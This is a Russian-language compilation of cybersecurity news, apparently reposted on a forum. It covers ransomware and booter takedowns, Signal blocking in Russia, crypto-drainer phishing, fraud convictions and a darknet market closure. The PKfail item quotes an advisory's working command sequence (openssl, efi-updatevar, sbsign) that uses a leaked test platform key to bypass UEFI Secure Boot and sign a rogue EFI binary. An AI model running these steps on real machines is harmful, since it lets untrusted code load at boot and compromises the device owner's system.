После атаки, если компания не выходила на контакт, преступники сами связывались с сотрудниками через электронную почту или звонки, угрожая публикацией украденных данных. Злоумышленники также отправляли ссылки на платформы, где выкладывались украденные файлы, усиливая давление на пострадавших. Вместо скриншотов с украденной информацией, хакеры прикрепляли на страницу утечки небольшие видеозаписи, где наглядно демонстрируют каталоги с похищенными данными.
ФБР призвало всех, кто пострадал от действий DISPOSSESSOR, связаться с Центром жалоб на интернет-преступления (IC3) или по горячей линии 1-800-CALL FBI.
Ранее группировка Dispossessor действовала как группа вымогателей, выкладывая украденные данные, похищенные в ходе атак других программ-вымогателей, таких как LockBit. Впоследствии хакеры перепродавали данные на различных подпольных форумах. В июне 2024 года преступники начали использовать утекший в сеть шифровальщик LockBit 3.0, что значительно усилило масштабы их атак. Некоторые исследователи считают группу созданной бывшими участниками LockBit, что подтвердили сами хакеры, однако достоверность их слов проверить невозможно.
• Source: https://www.fbi[.]gov/contact-us/field- offices/cleveland/news/international-investigation-leads-to-shutdown-of- ransomware-group
В России начали блокировать защищенный мессенджер Signal, он не открывается без VPN. Сервисы «Сбой.рф» и Downradar зафиксировали 9 августа рост жалоб на работу мессенджера. К 16 часам по московскому времени пользователи «Сбой.рф» оставили более 2 тысяч жалоб на то, что у них не работает Signal.
О том, что Signal блокируют, пишут «Важные истории», и это подтверждает исполнительный директор «Общества защиты интернета» Михаил Климарев в своем Telegram-канале «ЗаТелеком». «У меня есть единственная гипотеза, зачем и почему: Курская область. Кто-то кому-то в этих вот „спецслужбах” брякнул, что ВСУ общаются посредством „Сигнала”, и потому было принято решение „нарушить взаимодействие частей противника”. Методом блокировки на территории всей страны», — написал Климарев.
The Insider ознакомился с данными проекта OONI (Open Observatory of Network Interference), который постоянно проводит тесты на блокировку ключевых сервисов в разных странах мира. Судя по ним, блокировать Signal в России начали вечером 8 августа, а на следующий день мессенджер не работал в большинстве проведенных тестов. В графике OONI это отображается как «аномалия». Как правило, это означает, что сервис не заблокирован полностью или обычным путем и не «упал», а подвергается фильтрации через ТСПУ (технические средства противодействия угрозам).
Если власти России действительно применяют фильтрацию трафика, это означает, что блокировка происходит без какого-либо постановления суда и уведомления операторов связи. Возможно, сбои в Signal наблюдаются только в некоторых регионах России.
Обойти блокировку можно, включив режим «Обход цензуры» (Censorship Circumvention) в настройках мессенджера. «Идем в настройки —> Конфиденциальность —> Расширенные, в самом низу экрана —> тапаем „Обход цензуры”. Можно еще выбрать страну, через которую блокировки будут обходиться, — на ваш вкус, любую, или взять то, что предложится», — пишет «ЗаТелеком».
Signal использует сквозное шифрование, что, как считается, позволяет защитить переписку от перехвата оператором сотовой связи и спецслужбами. Ранее российские власти не пытались блокировать этот мессенджер. В конце января мессенджеры Telegram и WhatsApp были временно заблокированы в Якутии на фоне стихийных митингов, начавшихся после убийства жителя Якутска, в котором заподозрили гражданина Таджикистана. Тогда же, в январе, аналогичные блокировки наблюдались в Башкортостане, где начались массовые протесты из-за приговора местному активисту Фаилю Алсынову.
В июле российские пользователи начали жаловаться на замедление работы YouTube. В «Ростелекоме» заявляли, что вина за ухудшение работы видеохостинга лежит на корпорации Google, которая с 2022 года «не занимается расширением и обновлением» оборудования в России. 8 августа начали поступать сообщения, что YouTube перестал открываться на компьютерах.
Суд приговорил жителя Новосибирской области к пяти годам лишения свободы за заведомо ложный донос с искусственным созданием доказательств обвинения.
Пресс-служба военных судов 6 августа в телеграм-канале разместила информацию о судебном процессе, который проходил во 2-м Восточном окружном военном суде.
В качестве обвиняемого выступал житель Новосибирской области Петр Ременных. Подсудимый, как говорится в приговоре, «действуя из личных неприязненных отношений к потерпевшему, с которым у него имелись неразрешенные финансовые споры, желая привлечения его к уголовной ответственности, совершил ложный донос о совершении им преступлений, с искусственным созданием доказательств обвинения».
Обвиняемый от имени потерпевшего зарегистрировал страничку в социальной сети «ВКонтакте» и мессенджере Telegram. Там Ременных размещал от имени потерпевшего «публикации, оскорбляющие память защитников Отечества, унижающие честь и достоинство ветеранов Великой Отечественной войны, а также содержащие публичные призывы к осуществлению террористической, экстремистской деятельности и публичное оправдание терроризма».
Сами публикации осуществлялись с приобретенного специально для этих целей планшетного компьютера с сим-картой, причем Ременных размещал посты находясь около дома жертвы. Сам планшет прятал один из знакомых Ременных около дома потерпевшего, где его и обнаружили сотрудники ФСБ России.
2-й Восточный окружной военный суд приговорил Ременных к 5 годам лишения свободы с отбыванием наказания в колонии общего режима. Также он лишен права заниматься деятельностью, связанной с публичным размещением обращений и иных материалов в информационно-телекоммуникационных сетях общего пользования, включая интернет, на срок 2 года 6 месяцев.
• Source: https://t.me/VtoroiVostochOvs/1173
Пентест — это самая творческая ИБ-дисциплина, а у всех творческих профессий есть премии. Awillix сделали Pentest Awards, чтобы этичные хакеры наконец смогли заявить о себе, рассказать о достижениях и получить признание отрасли.
«Бренд» русских хакеров воспринимается негативно и люди знают только про скандалы об утечках, хотя огромное множество талантливых профессионалов сейчас работают на киберфронте на стороне добра, делают вещи гораздо сложнее и круче злоумышленников, спасают ИТ-инфраструктуру бизнесов и не попадают за это в новости, в отличии от преступников.
Чтобы популяризировать профессию этичного хакера в нашей стране, появилась первая в России премия для пентестеров. Специалисты, которые драйвят рынок и задают высокую планку в профессиональном комьюнити, смогут получить признание, дорогие награды и подать пример начинающим.
Сбор заявок и определение победителей
Оружие пентестера — опыт, креатив и насмотренность. Это оружие он применяет каждый день в работе, поэтому подать заявку будет проще простого — достаточно обезличенного рассказа про свой лучший проект в свободной форме. Всего в премии шесть номинаций, относящихся к разным стадиям имитации хакерских атак. На сайте Pentest award есть пример подачи и критерии оценки работ.
Оценивает заявки независимый совет жюри, который состоит из лучших практикующих оффенсив-безопасников топовых российских компаний. Проголосовав и посовещавшись, они представят шорт-лист номинантов в конце июля.
Победители будут объявлены на церемонии награждения. За первое место подарят MacBook, за второе — iPhone, за третье — Apple Watch. Благодаря партнерам премии, победители получат билеты на конференцию Offzone, фирменный мерч и сертификаты на обучение в CyberED.
Подавайте заявки на участие прямо сейчас, время ограничено. Каждый имеет шанс на победу! Поддержите новый проект, поделившись новостью с коллегами!
Сооснователь мессенджера Telegram Павел Дуров принял решение активизировать борьбу с мошенничеством. В частности, всем пользователям будут видны данные о стране и месяце регистрации публичных аккаунтов.
По словам Дурова, похожий механизм в тех же целях задействует социальная сеть Instagram. Вместе с тем, сооснователь проекта пообещал, что Telegram разрешит организациям использовать мини-приложения для верификации каналов. Уже сейчас ведется работа над созданием отдельного децентрализованного рынка внутри мессенджера.
Дуров также пообещал, что в скором времени пользователи приложения смогут опробовать встроенный браузер с поддержкой Web3-страниц, а также магазин мини- приложений.
t.me/durov/336
Подросток из Великобритании был приговорён к 20 месяцам тюрьмы за участие в киберпреступных схемах, включая атаки с подменой SIM-карт.
Полиция Норфолка заявила, что дело 19-летнего Эллиота Гантона, проживающего в Норидже, слушалось местным судом. Гантону вменялась киберпреступная деятельность.
Изначально юноша обвинялся в отмывании денежных средств и взломе австралийского аккаунта Instagram. Когда следователи изучили его ноутбук, стало понятно, что молодой человек промышлял и куда более серьёзными незаконными делами.
В частности, Гантон предлагал свои услуги в качестве провайдера хакерских сервисов. Тем, кто его нанимали, подросток обещал поставлять персональную информацию целей: имена, адреса, детали онлайн-аккаунтов.
Все эти данные впоследствии использовались для мошеннических действий с подменой SIM-карт.
Как вы наверняка знаете, чтобы осуществить такие атаки, злоумышленник должен позвонить оператору связи, представившись жертвой. Именно здесь потребуются персональные данные человека, чтобы убедить оператора в том, что мошенник — настоящий абонент.
• Source: norfolk.police.uk/news/latest-news/16-08-2019/man-sentenced-hacking- offences#na
Поручение проработать такие поправки дал министр Колокольцев.
По инициативе главы правительственной комиссии по профилактике правонарушений, министра внутренних дел Владимира Колокольцева, в Уголовный кодекс РФ [предлагается](https://iz.ru/1661129/2024-03-07/v-rossii-k-otiagchaiushchim- obstoiatelstvam-v-uk-otnesut-prestupleniia-s-pomoshchiu-it) внести изменения, касающиеся использования IT-технологий в качестве отягчающего обстоятельства при совершении преступлений.
В соответствии с поручением, направленным Следственному комитету РФ в сотрудничестве с Министерством внутренних дел и другими заинтересованными органами, предлагается добавить в статью 63 Уголовного кодекса новое отягчающее обстоятельство — «совершение преступления с использованием информационно-коммуникационных технологий».
Помимо этого, в рамках усиления ответственности за преступления, связанные с цифровыми активами, предлагается дополнить статьи № 104.1, № 5 и № 115 УК РФ положениями, которые позволят конфисковать цифровую валюту, признанную имуществом, в рамках уголовного процесса.
Органам, задействованным в реализации данных инициатив, поручено предоставить отчёт о проделанной работе правительственной комиссии до 1 декабря 2024 года.
Источник: securitylab.ru
Исследователи из Group-IB поделились антидостижениями матёрых киберпреступников.
Международная компания по кибербезопасности Group-IB сообщила о деятельности ныне несуществующей операции Inferno Drainer, создавшей более 16 тысяч мошеннических доменов в период с 2022 по 2023 год.
Злоумышленники использовали высококачественные фишинговые страницы для привлечения пользователей, чтобы те подключали свои криптовалютные кошельки к инфраструктуре мошенников. При этом использовались поддельные Web3-протоколы, чтобы обманом заставить жертв авторизовать транзакции.
Inferno Drainer, активная с ноября 2022 по ноябрь 2023 года, незаконно заработала более $87 миллионов, обманув свыше 137 000 жертв. Этот вредоносный программный комплекс является частью широкого спектра подобных продуктов, доступных по модели «Drainer-as-a-service» (DaaS) с отчислениями в 20% от доходов аффилиатов.
Клиенты Inferno Drainer могли загружать вредоносное ПО на свои фишинговые сайты или использовать услуги разработчиков для создания и хостинга таких сайтов — иногда уже за 30% от украденных активов.
Анализ 500 таких вредоносных доменов показал, что вредоносное ПО на базе JavaScript изначально размещалось на GitHub, а затем интегрировалось непосредственно на веб-сайты. Затем эти сайты распространялись через такие платформы, как Discord и X *, предлагая жертвам бесплатные токены (так называемые «airdrops») и подключение их кошельков, после чего активы утекали при одобрении транзакций.
Именно такими бесплатными токенами мошенники недавно заманивали подписчиков ИБ-компании Mandiant, профиль которой в начале января был взломан и использован злоумышленниками в корыстных целях.
Ожидается, что попытки взлома официальных аккаунтов участятся, так как сообщения, якобы написанные авторитетными лицами, могут внушать доверие и заставлять жертв переходить по ссылкам, отдавая свои сбережения злоумышленникам.
В своих атаках мошенники использовали такие названия скриптов, как «seapоrt.js», «coinbаse.js» и «wallet-connect.js», чтобы маскировать их под популярные Web3-протоколы Seaport, Coinbase и WalletConnect для осуществления несанкционированных транзакций.
Аналитики Group-IB отмечают, что типичной особенностью фишинговых сайтов Inferno Drainer является невозможность открыть исходный код сайта с помощью горячих клавиш или правого клика мыши. Это указывает на попытки преступников скрыть свои скрипты и нелегальную деятельность от жертв.
Group-IB также предполагает, что успех Inferno Drainer может спровоцировать создание новых дрейнеров и увеличение числа сайтов с мошенническими скриптами, имитирующими Web3-протоколы.
Эксперты также подчеркнули, что, несмотря на прекращение активности Inferno Drainer, влияние этой вредоносной операции несёт серьёзные риски для владельцев криптовалют, поскольку подобные методы атак лишь продолжают совершенствоваться.
Code:Copy to clipboard
https://www.group-ib.com/blog/inferno-drainer/
Исследователи безопасности из компании Binarly [выявили](https://www.binarly.io/blog/pkfail-untrusted-platform-keys- undermine-secure-boot-on-uefi-ecosystem) возможность обхода режима верифицированной загрузки UEFI Secure Boot на [более чем 800](https://github.com/binarly- io/SupplyChainAttacks/blob/main/PKfail/ImpactedDevices.md) продуктах, выпущенных компаниями Acer, Dell, Fujitsu, Gigabyte, HP, Intel, Lenovo и Supermicro. Проблема получила кодовое имя PKfail и связана с использованием в прошивках не заслуживающего доверия ключа платформы (PK, Platform Key), сгенерированного компанией AMI (American Megatrends International) и поставляемого в качестве тестового примера. Наиболее старые прошивки, в которых использовался тестовый ключ, выпущены в 2012 году, а самые новые датированы июнем 2024 года. По данным исследователей проблеме подвержены более 10% всех проверенных прошивок.
В параметрах ключа указывалось, что он не заслуживает доверия и его не следует поставлять в своих продуктах. Подразумевалось, что данный тестовый ключ следует заменить на собственный, но производители не обратили внимание на предупреждение и использовали в итоговых прошивках типовой общий ключ, отправляемый всем партнёрам и клиентам компании AMI.
Закрытая часть тестового ключа AMI, необходимая для создания цифровых подписей, оказалась доступна публично после утечки информации у одного из производителей оборудования, сотрудник которого по ошибке разместил в [публичном репозитории](https://web.archive.org/web/20230514210613/https://github.com/raywu- aaeon/Ryzen2000_4000) на GitHub код, содержащий данный ключ. Закрытый ключ был размещён в зашифрованном файле, при шифровании которого использовался простой 4-символьный пароль, который удалось легко подобрать методом перебора.
Ключ платформы используется в качестве корня доверия для заверения БД с ключами для Secure Boot. Получение закрытой части ключа платформы приводит к компрометации всей цепочки доверия, задействованной при проверке валидности компонентов загружаемой системы - зная ключ платформы можно обойти защиту Secure Boot и организовать подстановку при загрузке собственных компонентов через манипуляцию ключом KEK (Key Exchange Key) и базами данных "db" (Signature Database) и "dbx" (Forbidden Signature Database). KEK отвечает за создание цепочки доверия между прошивкой и операционной системой, "db" содержит сертификаты и подписи для загрузчика и сторонних компонентов UEFI, а "dbx" включает отозванные подписи известных вредоносных компонентов.
Для совершения атаки [достаточно](https://www.binarly.io/advisories/brly-2024-005-usage-of-default- test-keys-leads-to-complete-secure-boot-bypass) сгенерировать новые ключи и сертификаты для KEK и db, после чего использовать попавший в открытый доступ тестовый ключ платформы для загрузки в UEFI-прошивку созданного KEK- сертификата. Загрузив в прошивку KEK-сертификат можно использовать связанный с ним закрытый ключ для загрузки в БД db нового сертификата. После загрузки сертификата db, связанный с ним закрытый ключ может применяться для заверения загружаемых EFI-компонентов.
openssl req -newkey rsa:4096 -nodes -keyout KEK.key -new -x509 -sha256 -days 3650 -subj "/CN=BRLY KEK/" -out KEK.crt
openssl req -newkey rsa:4096 -nodes -keyout db.key -new -x509 -sha256 -days 3650 -subj "/CN=BRLY db/" -out db.crtefi-updatevar -a -c KEK.crt -k PK.key KEK
efi-updatevar -a -c db.crt -k KEK.key db
sbsign --key db.key --cert db.crt --output rogue.efi.signed rogue.efiClick to expand...
Для проверки корректности ключа платформы достаточно запустить утилиту "efi- readvar -v PK" из пакета efitools и убедиться, что ключ платформы не является тестовым:
efi-readvar -v PK
Variable PK, length 862
PK: List 0, type X509
Signature 0, size 834, owner 26dc4851-195f-4ae1-9a19-fbf883bbb35e
Subject:
CN=DO NOT TRUST - AMI Test PK
Issuer:
CN=DO NOT TRUST - AMI Test PKClick to expand...
Рука правосудия настигла администраторов booter-сервисов в реальности,
шестерым подозреваемым предъявлены обвинения.
Министерство юстиции США конфисковало 48 доменов и предъявило обвинения шести подозреваемым в администрировании booter-сервисов. Кроме того, подозреваемые обвинены в использовании IP-стрессеров против чужих сетей и серверов, что является нарушением закона.
Booter'ы, также известные как booter-сервисы, представляют собой услуги DDoS- атак, предоставляемые по запросу и предлагаемые предприимчивыми преступниками с целью вывести из строя веб-сайты и сети. Другими словами, booter'ы – это незаконное использование IP-адресов.
Как выяснили специальные агенты ФБР, киберпреступники оплачивают услуги таких сервисов криптовалютой.

DDoS-атака, проведенная специальным агентом ФБР с одного из захваченных доменов
И хотя почти все сайты booter’ов/стрессеров заставляют пользователя принять соглашение, в котором прописан запрет на использование услуг для проведения атак, владельцы таких платформ сами рекламируют их на хакерских форумах.
Недавно прокуратура США объявила о предъявлении обвинений шести лицам за администрирование booter-сервисов. Среди подозреваемых – один человек из Техаса, трое из Флориды, один из Нью-Йорка и еще один с Гавайев, которые предположительно управляли платформами RoyalStresser.com, SecurityTeam.io, Astrostress.com, Booter.sx, Ipstressor.com и TrueSecurityServices.io.
А в рамках более масштабной операции против DDoS-наемников, которая получила название Operation PowerOFF, ФБР и международные правоохранительные органы смогли конфисковать 48 интернет-доменов, используемых booter-сервисами по всему миру. Кроме того, правоохранители работают над тем, чтобы на всех конфискованных доменах было сообщение о том, что использование подобных сервисов незаконно.
source:
justice[.]gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-
charge-6-defendants-operating-websites
fbi.gov/contact-us/field-offices/anchorage/fbi-intensify-efforts-to-combat-
illegal-ddos-attacks
В России стало очень много ИТ-специалистов, чьи компетенции в своей сфере недостаточно высоки. С ними сталкиваются не только непосредственные работодатели, но и рекрутеры – они на регулярной основе общаются с кандидатами на ИТ-вакансии, имеющими малый багаж знаний и опыта. Одна из причин – появление в отрасли большого числа специалистов, пришедших из других сфер и прошедших курсы переквалификации. Хуже всего обстоят дела в сферах системной аналитики и frontend-разработки.
Поток неквалифицированных кадров
В России возникли сложности при подборе компетентных специалистов на различные должности, сообщили CNews представители консалтинговой компании Nordcore, занимающейся подбором и предоставлением персонала. По данным аналитиков компании, в целом на проблемы в различных отраслях с поиском высококвалифицированных кадров говорят 54% рекрутеров.
Если же рассматривать исключительно российскую отрасль информационных технологий, то здесь количество специалистов по поиску кадров, недовольных уровнем знаний соискателей на вакансии, значительно выше. О недостаточном уровне компетенций кандидатов говорят 66% рекрутеров. Аналогичная ситуация складывается и в сфере телекоммуникаций.
Также при поиске кандидата на ИТ-вакансию рекрутеры сталкиваются с еще одной проблемой – часто они не успевают завершить процесс найма конкретного специалиста – он уходит в другую компанию. На это указали 40% опрошенных Nordcore специалистов по кадрам.
Причина лежит на поверхности
Эксперты связывают падение уровня компетенций российских ИТ-специалистов со сложившимся в отрасли кадровым голодом. Компании постоянно находятся в поиске сотрудников, а спрос рождает предложение – в ИТ-сферу пытаются войти люди, которые раньше работали в совершенно других отраслях.
«Снижение компетенций ИТ-специалистов спровоцировано высоким спросом на них во всех отраслях, что, в свою очередь, вызвано нестабильной экономической ситуацией и оттоком кадров, – сказала CNews генеральный директор Nordcore Лариса Катунина. – Бизнесу сегодня необходимо достаточно оперативно восполнять кадровые ресурсы в связи с повсеместной цифровизацией».
Глава Nordcore подтверждает, что ИТ-компаниям приходится обращать внимание на «перебежчиков» из других профессий. «Многие компании рассматривают рескиллеров – людей, которые переобучились на ИТ-специалиста из других сфер, – сообщила CNews Лариса Катунина. – И вот здесь кроется одна из главных проблем: в основе мотивации для переквалификации зачастую лежит быстрый карьерный трек и высокие заработные платы. Такой подход не предполагает глубины знаний».
По словам Катуниной, специалисты по работе с кадрами видят, что на открытые вакансии в сфере информационных технологий сейчас идут люди «с совершенно разным опытом». Она привела в пример, в частности, логистов и бухгалтеров, а также домохозяек, которые прошли курсы переквалификации. «При этом многие из них не до конца объективно оценивают специфику будущей специальности – интересна ли эта сфера в целом, пул задач, которые предстоит решать, команды, с которыми предстоит работать», – добавила гендиректор Nordcore.
Чаще всего курсы переквалификации – это обучение в различных онлайн-школах, которые на волне роста популярности ИТ-сферы начали предлагать изобилие соответствующих курсов. Среди них есть и так называемые «интенсивы», позволяющие освоить ту или иную ИТ-профессию за несколько недель, а иногда и дней. CNews писал, что ИТ-работодатели с недоверием относятся к выпускникам таких школ и не спешат принимать их на работу.
Основные зоны риска
Лариса Катунина раскрыла CNews несколько специальностей, где проблема с низко- и неквалифицированными кадрами стоит особенно остро. По ее оценке, это в первую очередь системная аналитика и frontend-разработка.
«Это можно связать с тем, что стек во frontend чуть более простой, чем в backend-разработке – язык JavaScript можно изучить быстрее, чем, к примеру, С#, – отметила Лариса Катунина. – Таким образом, большинство начинающих специалистов сегодня идут в ту специализацию, которой проще обучиться. И лишь немногие в дальнейшем стараются «добрать» знания внутри компании».
При этом глава Nordcore обратила внимание еще и на тот факт, что неквалифицированные ИТ-специалисты не стремятся задержаться в одной компании как можно дольше. «Зачастую специалисты отрабатывают в одной компании около полугода и, заручившись строчкой в резюме, повышают должность в другой», – сказала она.
Мнение отрасли
Крупные российские ИТ-компании подтверждают факт наличия в отрасли большого количества некомпетентных специалистов. «Да, рекрутеры сталкиваются с низким уровнем компетенций кандидатов на ИТ-вакансии, – сказала CNews Мария Григорович, HR-директор компании SL Soft (разработчик ПО, входит в ГК Softline). – Рынок труда в этой сфере очень конкурентный, и за специалистов борются как маленькие, так и большие компании. Требования к синьорным позициям очень высокие, поэтому количество интервьюируемых кандидатов увеличивается».
По словам Григорович, многие кандидаты на ИТ-вакансии «имеют завышенные ожидания по зарплате и компенсационному пакету», и что они нередко «одновременно рассматривают предложения от нескольких компаний, а некоторые просто оценивают свою рыночную стоимость, не имея намерения менять работу».
«Компании конкурируют не только за новых кандидатов, но и за удержание текущих сотрудников, – добавила Мария Григорович. – Ситуация осложняется тем, что на рынке не хватает квалифицированных специалистов, несмотря на большое количество вакансий. Этот дефицит ощущается особенно остро после пандемии, когда спрос на ИТ-специалистов резко возрос».
HR-директор SL Soft подчеркнула, что ИТ-компаниям непросто находить кандидатов на высококвалифицированные позиции – это, по ее словам, «по-прежнему сложно и требует значительных усилий и времени». «Таким образом, проблема низкого уровня компетенций кандидатов на ИТ-вакансии существует, и рекрутеры сталкиваются с ней регулярно», – подытожила Мария Григорович.
HR бизнес-партнер компании «Базис» (российский разработчик ПО для оказания облачных услуг и платформы динамической инфраструктуры) Александр Ковалев сообщил CNews: «Чем востребованнее ИT, тем больше желающих в него попасть, тем выше зарплатные ожидания по рынку, тем ниже их уровень знаний. Ситуация когда кандидат с меньшим багажом опыта и знаний хочет заработок выше более опытных уже устроенных в компании коллег - как ни печально, но типичен. Мы как вендор тоже с этим сталкиваемся. Залог успеха - учить и взращивать своих специалистов и отслеживать актуальность условий по рынку для сотрудников и своевременно их индексировать.
Двое мужчин, которые украли криптовалюту на сумму более 5,7 млн фунтов стерлингов у жертв по всему миру, были заключены в тюрьму.
Джейк Ли, 38 лет, из Чарлкомба в Бате, и Джеймс Хеппел, 42 года, из Ставертона в Уилтшире, оба признали себя виновными по трем пунктам обвинения в сговоре с целью совершения мошенничества.
Юго-Западное региональное подразделение по борьбе с организованной преступностью (SWROCU) выявило 55 жертв в 26 странах, в том числе 11 из Великобритании, которые стали мишенями этой пары.
Ли был приговорен к четырем годам тюремного заключения, а Хеппел был приговорен к 15 месяцам в королевском суде Бристоля 3 мая.
Среди наличных денег были 551 000 фунтов стерлингов в чемодане, который Ли добровольно передал в январе.
Пара осуществила мошенничество, скопировав веб-сайт криптовалютной биржи Blockchain.com чтобы получить доступ к биткоин-кошелькам жертв, что позволило им украсть их средства и данные для входа в систему.
Полиция конфисковала гравюру работы Бэнкси "Бомба любви" 2003 года стоимостью 60 000 фунтов стерлингов, наличные на общую сумму 835 000 фунтов стерлингов, криптовалюту на сумму 64 000 фунтов стерлингов и три автомобиля.
В отношении Ли был вынесен судебный приказ о конфискации почти 1 миллиона фунтов стерлингов, которые будут использованы для выплаты компенсаций пострадавшим.
В настоящее время в отношении Хеппела ведется разбирательство, связанное с аналогичным приказом, который заставляет преступников отдавать имеющиеся деньги и активы или увеличивать срок тюремного заключения.
Мистер Брейн добавил: “Мы взялись за расследование в отношении Ли и, проанализировав его устройства, установили, что он был центральной фигурой, причастной к изощренному мошенничеству с подделкой доменов, и работал над выявлением многочисленных жертв.
“Выявление правонарушений Ли и Хеппела и связей с другими подозреваемыми и криптовалютными биржами по всему миру было сложной работой, но тот факт, что они оба признали себя виновными по всем пунктам обвинения, что исключает необходимость шестинедельного судебного разбирательства, свидетельствует о силе доказательств, которые мы собрали против них”.
Памела Джейн, прокурор-специалист Международного управления по борьбе с организованной экономической преступностью Королевской прокурорской службы, сказала: “Это было сложное и трудоемкое судебное преследование, которое включало в себя опросы многочисленных потерпевших и органов прокуратуры по всему миру".
bbc.com/news/articles/c51nrre156xo
В Марий Эл по материалам регионального УФСБ осудили хакера, который с помощью вредоносного софта взламывал сервера на территории иностранных государств.
Как оказалось, что злоумышленник взламывал информационные системы с марта 2021 года по ноябрь 2023 года. В итоге местный житель был признан виновным, а Медведевский районный суд вынес обвинительный приговор по части 1 статьи 273 УК РФ «Создание, использование и распространение вредоносных компьютерный программ».
Приговор вступил в законную силу, сообщает пресс-служба УФСБ РФ по РМЭ.
В Мадриде задержали троих злоумышленников, которые пытались похитить около 78 тонн замороженной курицы. С этой целью они задействовали способ так называемой компрометации деловой электронной почты (BEC).
Отмечается, что в списке арестованных числится мошенник, на которого в Румынии уже был ранее выдан ордер на арест и тюремное заключение. Он обвиняется в совершении серии кибератак в Польше и Финляндии.
Так, чтобы втереться в доверие к работникам предприятия по производству замороженной курицы из Финляндии, мошенники представлялись якобы надежным поставщиком из Нидерландов. В результате, они обманом заставили их направить 78 тонн продукции суммарно примерно на 300 тысяч евро.
Кроме того, уже была внесена часть средств в качестве предоплаты и оговорена компенсация за транспортировку. Однако, отправили курицу не в Нидерланды, а в Мадрид и Севилью. Таким образом, финская компания потеряла право потребовать оплату или осуществить возврат данного товара.
Всеволод Кокорин, исследователь безопасности из SolidLab, опубликовал сообщение на X, ранее известной как Twitter, выражая разочарование в адрес Microsoft после того, как он обнаружил и ответственно сообщил о серьезной уязвимости, влияющей на электронную почту Outlook, но ему сказали, что ее невозможно воспроизвести.
__https://twitter.com/x/status/1801521692314927433
Ошибка, технические детали которой Кокорин справедливо отказывается предоставлять в данный момент, позволяет любому, отправляющему электронное письмо другому пользователю Outlook, выдавать себя за официальные корпоративные аккаунты Microsoft. Как показано в примере, опубликованном на X, это означает, что письмо может выглядеть как отправленное командой безопасности Microsoft, со всеми вытекающими последствиями для фишинга, распространения вредоносного ПО и киберпреступности.
Источник: [https://www.forbes.com/sites/daveyw...-million-outlook-users-as- email-bug-revealed/](https://www.forbes.com/sites/daveywinder/2024/06/21/new- security-warning-for-400-million-outlook-users-as-email-bug-revealed/)
Никто не просил но моё личное мнение на эту тему:
Знакомый нашел уязвимость которая обходит 2фа в аутлук, отписал в майкрософт и
уже как год нормального ответа от них нет + Слонсер очень хороший вебщик, так
что по ходу история правдива. Билл-у не помешало бы как Трамп работников
уволнять (you are fired).
Бюро промышленности и безопасности (BIS) Министерства торговли США объявило, что запретило российской компании по производству антивирусного программного обеспечения и кибербезопасности «Лаборатории Касперского» предоставлять антивирусное программное обеспечение и продукты или услуги кибербезопасности в США или гражданам США. Этот запрет распространяется на все дочерние, дочерние и материнские компании «Лаборатории Касперского», а также на саму «Лабораторию Касперского». Приказ запрещает продажу продуктов «Лаборатории Касперского», а также предоставление антивирусного программного обеспечения и любых обновлений, что потребует от всех пользователей «Лаборатории Касперского» в США найти альтернативное программное обеспечение для использования к концу сентября 2024 года.
[https://www.bis.gov/press-release/c...ibits-russian-kaspersky-software-us- customers](https://www.bis.gov/press-release/commerce-department-prohibits- russian-kaspersky-software-us-customers)
Киберполицейские и детективы Бюро экономической безопасности под процессуальным руководством Офиса Генерального прокурора прекратили деятельность подпольного онлайн-казино. Обвинительный акт в отношении пятерых членов группировки направлен в суд.
Правоохранители в феврале этого года установили, что организатор «бизнеса» продумал преступную схему и привлек к противоправной деятельности знакомого с навыками программирования. Последний создал сайт для проведения азартных игр онлайн. Мужчины рекламировали услуги онлайн-казино в социальных сетях.
Фигуранты организовали круглосуточный колцентр для приема платежей от игроков, общения с ними в мессенджерах, формирования индивидуальной ссылки на игру и выплаты выигрыша. К работе операторами привлекли еще троих знакомых.
Для конспирации участники группировки использовали карточные счета третьих лиц, так называемых дропов.
Правоохранители прекратили работу онлайн-казино и провели обыски в помещениях фигурантов на территории Киева и Полтавы.
Сейчас досудебное расследование в уголовном производстве завершено. В отношении пятерых членов организованной группы в Октябрьский районный суд города Полтавы направлен обвинительный акт по ч. 2, 3, 5 ст. 27, ч. 3 ст. 28, ч. 2 ст. 203-2 (Незаконная деятельность по организации или проведению азартных игр, лотерей) Уголовного Кодекса Украины.
В начале текущей недели издание Bleeping Computer обратило внимание на проблемы, возникшие в работе торговой площадки Empire в даркнете.
Все началось с того, что в прошлые выходные Empire ушел в оффлайн более чем на 48 часов, в чем встревоженные пользователи винили DDoS-атаку и подозревали exit scam. При этом главный модератор площадки, Se7en, выражал надежду, что администраторы в скором времени восстановят работу сайта, а некоторые пользователи сообщали, что даже смогли получить доступ к ресурсу, хотя и с большим трудом.
Анонимный Twitter-журналист DarkDotFail тоже писал о том, что, по его данным, торговая площадка подверглась серьезной DDoS-атаке и из-за этого операции с криптовалютой Monero невозможны. Аналогичную информацию, со ссылкой на собственные источники, сообщало и издание [Bitcoin News](https://news.bitcoin.com/darknet-giant-empire-market-offline-36-hours- blame-cast-massive-ddos-attack/).
Однако спустя пару дней Empire так и не возобновил работу, и Se7en опубликовал новое сообщение о ситуации. Он пишет, что в настоящее время возвращение маркетплейса выглядит маловероятным, панель модераторов по-прежнему не работает, а администрация не выходит на связь в Jabber.

Главный модератор предполагает, что админы Empire устали поддерживать торговую площадку на плаву. По его информации, в последние полгода сайт и так работал сам по себе, а контакты между администраторами и модераторами становились все более ограниченным.
«Последние полгода рынок находился в режиме автопилота, новых функций не добавляли. Я вносил разные предложения, предлагал (sic) избавиться PIN-кодов и использовать только PGP 2ФА или проверку кода XMR, чтобы сделать вывод XMR более надежным. Большинство моих предложений проигнорировали.
Раньше они прислушивались ко мне чаще. Когда маркетплейс только начинал работу, на нем была разрешена торговля оружием, но от этого отказались, когда я решительно выступил против того, чтобы Empire имел какое-то отношение к оружию», — рассказывает Se7en.Click to expand...
При этом Se7en считает, что дело не в exit scam’е, то есть, по его мнению, администрация Empire не пытается скрыться с деньгами пользователей, ведь в таких случаях администраторы обычно продолжают принимать платежи в течение долгих недель, прежде чем полностью исчезнуть.
«Если бы это был запланированный exit scam, не думаю, что они [администраторы] стали бы прилагать какие-то усилия для исправления вывода BTC незадолго до конца», — пишет модератор.
Click to expand...
Также Se7en обвиняет пользователя SchwererGustav в недавних DDoS-атаках на сайт, после чего тот якобы вымогал деньги у администраторов Empire. Якобы администраторы согласились выплачивать SchwererGustav примерно от 10 000-15 000 долларов в неделю, чтобы спасти торговую площадку и поддерживать ее работоспособность. Эта сделка оказала пагубное влияние на финансовое положение маркетплейса, а потом начались и другие DDoS-атаки, после чего администраторы, вероятно, приняли решение закрыть сайт.
